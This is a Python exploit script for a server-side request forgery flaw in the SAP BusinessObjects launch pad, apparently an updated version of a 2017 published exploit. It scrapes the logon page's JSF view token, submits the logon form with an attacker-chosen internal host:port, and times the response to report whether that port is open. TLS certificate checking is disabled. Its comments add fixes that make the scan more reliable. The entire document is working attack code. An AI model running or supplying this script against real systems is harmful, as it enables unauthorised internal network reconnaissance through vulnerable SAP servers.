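#!/usr/bin/env python
# Exploit Title: SAP BusinessObjects launch pad SSRF
# Date: 2017-11-8
# Exploit Author: Ahmad Mahfouz
# Category: Webapps
# Author Homepage: www.unixawy.com
# Description: Design Error in SAP BusinessObjects launch pad leads to SSRF attack
#
# SAP BusinessObjects launch pad SSRF Timing Attack Port scan
# usage : sblpta.py http://path.faces targetIP targetPort
#
# The logon form's CMS field ("host:port") is used by the launch pad for a
# server-side connection. The POST comes back quickly when that connection is
# refused and only after a long delay when something is listening, so the
# response time leaks the state of ports reachable from the SAP server
# (SSRF turned into a timing-based port scan). One invocation probes one port.
#
# Runs on Python 2.7.9+ and Python 3 (urlopen must accept an SSLContext).
from __future__ import print_function

import re
import socket
import ssl
import sys
import time
from datetime import datetime

try:  # Python 2
    from urllib import urlencode
    from urllib2 import Request, URLError, urlopen
except ImportError:  # Python 3
    from urllib.error import URLError
    from urllib.parse import urlencode
    from urllib.request import Request, urlopen

# Seconds a probe must take before the port is reported as open. The original
# script hard-coded 10 s; tune it if the target network behaves differently.
OPEN_THRESHOLD = 10.0
# Upper bound on any single request so a hanging SSRF cannot wedge the scan
# forever. Must stay well above OPEN_THRESHOLD or open ports are never seen.
REQUEST_TIMEOUT = 90.0
# Hidden JSF field whose per-view token the logon POST has to echo back.
VIEW_FIELD = "com.sun.faces.VIEW"
HEADERS = {"User-Agent": "Mozilla/5.0"}

# Exit codes, identical to the original script.
EXIT_USAGE = 1
EXIT_CONNECT = 2
EXIT_NO_VIEW = 3
EXIT_SESSION = 10

# Compiled once; applied to every line of the logon page.
_VALUE_ATTR = re.compile(r'value="([^"]*)"')


def make_ssl_context():
    """Return the TLS context used for every request to the launch pad.

    Certificate verification is deliberately disabled: assessment targets
    commonly run self-signed or internal-CA certificates. This context is
    only acceptable for a pentest tool aimed at a host you are authorised to
    test -- never reuse it in production code.
    """
    # Negotiate the highest TLS version both sides support instead of pinning
    # TLS 1.0 (the original PROTOCOL_TLSv1), which current servers refuse.
    if hasattr(ssl, "PROTOCOL_TLS"):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
    else:
        ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
    ctx.options |= ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3
    ctx.check_hostname = False  # must be cleared before CERT_NONE on Python 3
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def _to_text(data):
    """Decode bytes to text (UTF-8, lossy); return text unchanged."""
    if isinstance(data, bytes):
        return data.decode("utf-8", "replace")
    return data


def extract_view_token(lines):
    """Return the com.sun.faces.VIEW value from the logon page, or None.

    ``lines`` is an iterable of str or bytes lines. The token is taken from
    the double-quoted ``value="..."`` attribute of the first line mentioning
    the field -- the same assumption the original split-based parse made
    (JSF renders the hidden input on one line), without the IndexError it
    raised on any other layout.
    """
    for raw in lines:
        line = _to_text(raw)
        if VIEW_FIELD not in line:
            continue
        match = _VALUE_ATTR.search(line)
        if match:
            return match.group(1)
    return None


def classify_probe(body, elapsed, threshold=OPEN_THRESHOLD):
    """Classify one logon attempt as 'open', 'closed', 'expired' or 'unknown'.

    ``body`` is the response (str or bytes), ``elapsed`` the seconds the
    request took. An FWM marker is the launch pad's failed-logon response: a
    slow one (>= threshold) means the CMS connection hung on a listening
    port, a fast one that it was refused. FWC marks an expired view/session,
    as the original script interpreted it. Anything else is 'unknown' rather
    than silently ignored.
    """
    text = _to_text(body)
    if "FWM" in text:
        return "open" if elapsed >= threshold else "closed"
    if "FWC" in text:
        return "expired"
    return "unknown"


def fetch_logon_page(url, ctx):
    """GET the logon page; return (Set-Cookie header or None, list of lines).

    URLError / ssl.SSLError / socket.error propagate so main() can print the
    reason instead of swallowing it.
    """
    req = Request(url, headers=HEADERS)
    page = urlopen(req, context=ctx, timeout=REQUEST_TIMEOUT)
    try:
        # .headers.get exists on urllib2's mimetools.Message and on Python 3's
        # HTTPMessage alike, and yields None instead of KeyError when absent.
        return page.headers.get("Set-Cookie"), page.readlines()
    finally:
        page.close()


def probe_port(url, ctx, cookie, view_token, target):
    """POST the logon form with CMS=target; return (body_text, elapsed_s).

    Timing stops when the response headers arrive (urlopen returns), which is
    what the original measured; the body is read afterwards. Credentials are
    left empty on purpose -- only the CMS connect attempt is of interest.
    """
    form = {
        "_id0:logon:CMS": target,
        "_id0:logon:USERNAME": "",
        "_id0:logon:PASSWORD": "",
        VIEW_FIELD: view_token,
        "_id0": "_id0",
    }
    headers = dict(HEADERS)
    if cookie is not None:
        headers["Cookie"] = cookie
    req = Request(url, data=urlencode(form).encode("ascii"), headers=headers)
    start = time.time()
    # Same TLS context as the first request; the original omitted it here,
    # so an HTTPS target would have failed certificate validation on the POST.
    resp = urlopen(req, context=ctx, timeout=REQUEST_TIMEOUT)
    elapsed = time.time() - start
    try:
        return _to_text(resp.read()), elapsed
    finally:
        resp.close()


def main(argv):
    """Entry point; returns the process exit code (0 once a probe completed)."""
    if len(argv) != 4:
        print("Usage: python sblpta.py http://path.faces targetIP targetPort")
        return EXIT_USAGE
    url, target_ip, target_port = argv[1], argv[2], argv[3]
    if not target_port.isdigit() or not 0 < int(target_port) < 65536:
        print("[-] targetPort must be a number between 1 and 65535")
        return EXIT_USAGE
    target = "%s:%s" % (target_ip, target_port)

    print("\r\n")
    print("[*] SAP BusinessObjects Timing Attack")
    ctx = make_ssl_context()

    try:
        cookie, lines = fetch_logon_page(url, ctx)
    except (URLError, ssl.SSLError, socket.error, ValueError) as exc:
        # ValueError covers a malformed URL ("unknown url type").
        print("[-] Failed To connect to SAP Bussiness Object %s (%s)" % (url, exc))
        print("[*] SAP Bussiness Object Link example: "
              "http://domain:port/BZ/portal/95000047/InfoView/logon.faces")
        return EXIT_CONNECT
    print("[*] Connected to SAP Bussiness Object %s" % url)

    view_token = extract_view_token(lines)
    if not view_token:
        print("[-] Failed to java faces dynamic value, are you sure you "
              "extracted the java faces form from the link ??")
        return EXIT_NO_VIEW
    print("[*] Got java faces dynamic value")
    if cookie is None:
        # The original crashed with KeyError here. The probe may still work
        # if the view token is not session-bound, so warn and carry on; an
        # FWC answer below will tell us otherwise.
        print("[!] No Set-Cookie in the logon response; probing without a session cookie")

    print("[*] Testing Timing Attack %s" % datetime.now())
    started = time.time()
    try:
        body, elapsed = probe_port(url, ctx, cookie, view_token, target)
    except (URLError, ssl.SSLError, socket.timeout, socket.error) as exc:
        waited = time.time() - started
        if waited >= OPEN_THRESHOLD:
            # No answer within the cap is consistent with (not proof of) a
            # CMS connect that hung on a listening port.
            print("[?] Port %s: no answer after %.1fs (%s) - consistent with an "
                  "open port, verify manually" % (target_port, waited, exc))
            return 0
        print("[-] Probe request failed after %.1fs: %s" % (waited, exc))
        return EXIT_CONNECT

    verdict = classify_probe(body, elapsed)
    if verdict == "open":
        print("[*] Port %s is Open, Gotcha !!!  (%.1fs)" % (target_port, elapsed))
    elif verdict == "closed":
        print("[*] Port %s is Closed , we die fast (%.1fs)" % (target_port, elapsed))
    elif verdict == "expired":
        print("[-] error login expired")
        return EXIT_SESSION
    else:
        print("[-] Unexpected response (no FWM/FWC marker); the form field names "
              "or the page layout may differ from the original target")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))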